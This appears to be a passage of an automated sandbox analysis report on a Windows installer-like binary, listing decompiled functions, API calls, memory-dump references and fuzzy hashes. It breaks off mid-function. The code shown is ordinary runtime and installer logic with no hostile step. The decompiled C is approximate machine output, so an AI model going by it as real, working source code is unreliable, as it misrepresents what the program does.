                                                                    Similarity
                                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                    • API String ID: 854858120-615399546
                                                                    • Opcode ID: 302ca1a099cb30e81fc891af75844f8b62dda31169773e0edeec6a06f46f331e
                                                                    • Instruction ID: 0730013a778409a59d543d7128fc9cae65caf948aa4e6a3f37707057903c9a02
                                                                    • Opcode Fuzzy Hash: 302ca1a099cb30e81fc891af75844f8b62dda31169773e0edeec6a06f46f331e
                                                                    • Instruction Fuzzy Hash: 69512134A8030DABDB14EFE5C892ADEBBBAFF44304F60447AB404A76C1D7749E059B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00408E18(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E004092D8(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040901C(_t71);
								_t57 =  *0x6cf8fc; // 0x6c76d4
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00408AF8( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                    0x00408e1f
                                                                    0x00408e21
                                                                    0x00408e23
                                                                    0x00408e26
                                                                    0x00408e26
                                                                    0x00408e2d
                                                                    0x00408e34
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408e42
                                                                    0x00408e49
                                                                    0x00408ee1
                                                                    0x00408ee1
                                                                    0x00408ee1
                                                                    0x00408ee5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ef0
                                                                    0x00408ef6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ef8
                                                                    0x00408ef8
                                                                    0x00408efd
                                                                    0x00408f03
                                                                    0x00408f0a
                                                                    0x00408f14
                                                                    0x00408f19
                                                                    0x00408f20
                                                                    0x00408f27
                                                                    0x00408f35
                                                                    0x00408f43
                                                                    0x00408f37
                                                                    0x00408f3f
                                                                    0x00408f3f
                                                                    0x00408f35
                                                                    0x00408f49
                                                                    0x00408f6b
                                                                    0x00408f74
                                                                    0x00408f78
                                                                    0x00408f7c
                                                                    0x00000000
                                                                    0x00408f4b
                                                                    0x00408f4b
                                                                    0x00408f50
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408f5c
                                                                    0x00408f62
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408f64
                                                                    0x00000000
                                                                    0x00408f64
                                                                    0x00408f4b
                                                                    0x00408f81
                                                                    0x00408f81
                                                                    0x00408f90
                                                                    0x00408f97
                                                                    0x00408f9a
                                                                    0x00408f9a
                                                                    0x00000000
                                                                    0x00408f90
                                                                    0x00000000
                                                                    0x00408ee1
                                                                    0x00408e54
                                                                    0x00408e5a
                                                                    0x00408e60
                                                                    0x00408ebc
                                                                    0x00408ebf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408ec6
                                                                    0x00408ece
                                                                    0x00408ed4
                                                                    0x00408edf
                                                                    0x00000000
                                                                    0x00408edf
                                                                    0x00408ed6
                                                                    0x00000000
                                                                    0x00408ed6
                                                                    0x00000000
                                                                    0x00408e62
                                                                    0x00408e65
                                                                    0x00000000
                                                                    0x00408e74
                                                                    0x00408e74
                                                                    0x00408e74
                                                                    0x00000000
                                                                    0x00408e7d
                                                                    0x00408e80
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408e85
                                                                    0x00408eae
                                                                    0x00408eb2
                                                                    0x00408eb7
                                                                    0x00408eba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408eba
                                                                    0x00408e8e
                                                                    0x00408e94
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408e9b
                                                                    0x00408e9e
                                                                    0x00408ea5
                                                                    0x00000000
                                                                    0x00408ea5
                                                                    0x00408fa1
                                                                    0x00408fac

                                                                    APIs
                                                                      • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                                    • GetTickCount.KERNEL32 ref: 00408E4F
                                                                    • GetTickCount.KERNEL32 ref: 00408E67
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                                    • GetTickCount.KERNEL32 ref: 00408EC1
                                                                    • GetTickCount.KERNEL32 ref: 00408EF8
                                                                    • GetTickCount.KERNEL32 ref: 00408F22
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick$CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 3968769311-0
                                                                    • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                    • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                                    • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                    • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E006A5F04(void* __eax, void* __edx, intOrPtr _a4076) {
				char _v4120;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t6;
				void* _t11;
				signed char _t14;
				void* _t22;
				intOrPtr* _t23;
				void* _t24;
				void* _t28;
				long _t30;
				void* _t31;
				void* _t32;
				void* _t33;

				_push(__eax);
				_t6 = 2;
				do {
					_t32 = _t32 + 0xfffff004;
					_push(_t6);
					_t6 = _t6 - 1;
				} while (_t6 != 0);
				_t33 = _t32 + 4;
				_t28 = __edx;
				_t29 = _a4076;
				_t23 = E00414020(_t22, _a4076, GetModuleHandleW(L"kernel32.dll"), L"GetFinalPathNameByHandleW");
				if(_t23 == 0) {
					L11:
					_t11 = E0040A5A8(_t28, _t29);
				} else {
					_t14 = GetFileAttributesW(E0040B278(_t29));
					if(_t14 == 0xffffffff) {
						goto L11;
					} else {
						if((_t14 & 0x00000010) == 0) {
							_t30 = 0;
							__eflags = 0;
						} else {
							_t30 = 0x2000000;
						}
						_t31 = CreateFileW(E0040B278(_t29), 0, 7, 0, 3, _t30, 0);
						if(_t31 == 0xffffffff) {
							goto L11;
						} else {
							_t24 =  *_t23(_t31,  &_v4120, 0x1000, 0);
							CloseHandle(_t31);
							if(_t24 <= 0) {
								goto L11;
							} else {
								_t41 = _t24 - 0xff0;
								if(_t24 >= 0xff0) {
									goto L11;
								} else {
									_t11 = E006A5E1C(_t33, _t24, _t28, _t29, _t41);
								}
							}
						}
					}
				}
				return _t11;
			}


















                                                                    0x006a5f08
                                                                    0x006a5f09
                                                                    0x006a5f0e
                                                                    0x006a5f0e
                                                                    0x006a5f14
                                                                    0x006a5f15
                                                                    0x006a5f15
                                                                    0x006a5f1f
                                                                    0x006a5f22
                                                                    0x006a5f24
                                                                    0x006a5f3b
                                                                    0x006a5f3f
                                                                    0x006a5fad
                                                                    0x006a5fb1
                                                                    0x006a5f41
                                                                    0x006a5f49
                                                                    0x006a5f51
                                                                    0x00000000
                                                                    0x006a5f53
                                                                    0x006a5f55
                                                                    0x006a5f5e
                                                                    0x006a5f5e
                                                                    0x006a5f57
                                                                    0x006a5f57
                                                                    0x006a5f57
                                                                    0x006a5f78
                                                                    0x006a5f7d
                                                                    0x00000000
                                                                    0x006a5f7f
                                                                    0x006a5f8e
                                                                    0x006a5f91
                                                                    0x006a5f98
                                                                    0x00000000
                                                                    0x006a5f9a
                                                                    0x006a5f9a
                                                                    0x006a5fa0
                                                                    0x00000000
                                                                    0x006a5fa2
                                                                    0x006a5fa6
                                                                    0x006a5fa6
                                                                    0x006a5fa0
                                                                    0x006a5f98
                                                                    0x006a5f7d
                                                                    0x006a5f51
                                                                    0x006a5fc0

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                    • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                    • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandle$AttributesCloseCreateModule
                                                                    • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                    • API String ID: 791737717-340263132
                                                                    • Opcode ID: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
                                                                    • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                                    • Opcode Fuzzy Hash: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
                                                                    • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 36%
                                                                    			E00408BB4(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00405324();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E00406F0C(_v16);
						_push(_t41);
						_push(E00408C62);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00405324();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E00408C69);
							return E00406F28(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E004099B8();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                                    0x00408bb5
                                                                    0x00408bb7
                                                                    0x00408bbc
                                                                    0x00408bd6
                                                                    0x00408c69
                                                                    0x00408c69
                                                                    0x00000000
                                                                    0x00408bdc
                                                                    0x00408bdc
                                                                    0x00408bdf
                                                                    0x00408be0
                                                                    0x00408be2
                                                                    0x00408be9
                                                                    0x00000000
                                                                    0x00408bf5
                                                                    0x00408bfd
                                                                    0x00408c02
                                                                    0x00408c03
                                                                    0x00408c08
                                                                    0x00408c0b
                                                                    0x00408c11
                                                                    0x00408c15
                                                                    0x00408c16
                                                                    0x00408c1b
                                                                    0x00408c22
                                                                    0x00408c4c
                                                                    0x00408c4e
                                                                    0x00408c51
                                                                    0x00408c54
                                                                    0x00408c61
                                                                    0x00408c24
                                                                    0x00408c24
                                                                    0x00408c3f
                                                                    0x00408c42
                                                                    0x00408c4a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408c4a
                                                                    0x00408c35
                                                                    0x00408c38
                                                                    0x00408c70
                                                                    0x00408c76
                                                                    0x00408c76
                                                                    0x00408c22
                                                                    0x00408be9
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                                    • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                    • API String ID: 4275029093-79381301
                                                                    • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                    • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                                    • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                    • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E006B8141(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char* _t18;
				char* _t23;
				intOrPtr* _t25;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t45;
				void* _t48;

				if( *((char*)(_t48 - 0x21)) != 0) {
					_t18 =  *0x6cdfdc; // 0x6d62e4
					if( *_t18 != 0) {
						E00616130(L"Not restarting Windows because Uninstall is being run from the debugger.", __ebx, __edi, __esi);
					} else {
						E00616130(L"Restarting Windows.", __ebx, __edi, __esi);
						_t23 =  *0x6cdefc; // 0x6d6825
						 *_t23 = 1;
						if(E0060F6D8() == 0) {
							_t25 =  *0x6cdec4; // 0x6d579c
							SetForegroundWindow( *( *_t25 + 0x188));
							_push(1);
							_push(1);
							_t29 =  *0x6cded8; // 0x6d5c28
							_t3 = _t29 + 0x164; // 0x0
							_push(E0040B278( *_t3));
							_t32 =  *0x6cded8; // 0x6d5c28
							_t4 = _t32 + 0x15c; // 0x0
							_t34 = E0040B278( *_t4);
							_pop(_t45);
							E006AF190(_t34, __ebx, 0x30, _t45, __edi, __esi);
						}
					}
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(E006B8200);
				E0040A1C8(_t48 - 0x48);
				E0040A228(_t48 - 0x3c, 5);
				_t44 =  *0x4012b8; // 0x4012bc
				E0040C024(_t48 - 0x20, 7, _t44);
				return E0040A1EC(_t48 - 4);
			}













                                                                    0x006b8145
                                                                    0x006b8147
                                                                    0x006b814f
                                                                    0x006b81b6
                                                                    0x006b8151
                                                                    0x006b8156
                                                                    0x006b815b
                                                                    0x006b8160
                                                                    0x006b816a
                                                                    0x006b816c
                                                                    0x006b817a
                                                                    0x006b817f
                                                                    0x006b8181
                                                                    0x006b8183
                                                                    0x006b8188
                                                                    0x006b8193
                                                                    0x006b8194
                                                                    0x006b8199
                                                                    0x006b819f
                                                                    0x006b81a9
                                                                    0x006b81aa
                                                                    0x006b81aa
                                                                    0x006b816a
                                                                    0x006b814f
                                                                    0x006b81bd
                                                                    0x006b81c0
                                                                    0x006b81c3
                                                                    0x006b81cb
                                                                    0x006b81d8
                                                                    0x006b81e5
                                                                    0x006b81eb
                                                                    0x006b81f8

                                                                    APIs
                                                                      • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                      • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                    • SetForegroundWindow.USER32(?), ref: 006B817A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                    • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                                    • API String ID: 3179053593-36556386
                                                                    • Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                    • Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
                                                                    • Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                    • Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 43%
                                                                    			E00409E60(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x6cf05c == 0) {
					if( *0x6c5036 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L0040529C();
					}
					return _t3;
				} else {
					if( *0x6cf348 == 0xd7b2 &&  *0x6cf350 > 0) {
						 *0x6cf360();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E0040AC70(0x409ef4);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                    0x00409e68
                                                                    0x00409ece
                                                                    0x00409ed0
                                                                    0x00409ed2
                                                                    0x00409ed7
                                                                    0x00409edc
                                                                    0x00409ede
                                                                    0x00409ede
                                                                    0x00409ee4
                                                                    0x00409e6a
                                                                    0x00409e73
                                                                    0x00409e83
                                                                    0x00409e83
                                                                    0x00409e9f
                                                                    0x00409eb2
                                                                    0x00409ec6
                                                                    0x00409ec6

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: Error$Runtime error at 00000000
                                                                    • API String ID: 3320372497-2970929446
                                                                    • Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                    • Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
                                                                    • Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                    • Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E0043171C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					L00430EC8(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L0042F04C();
					return L00430EC8(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L0042F628();
						_t123 = _t64;
						if(_t123 == 0) {
							E00430C20(_t110);
						}
						L00431164(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00431694(_v788 - 1, _t125) != 0) {
								L0042F650();
								L00430EC8(_v792);
								L0042F650();
								L00430EC8( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004316C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
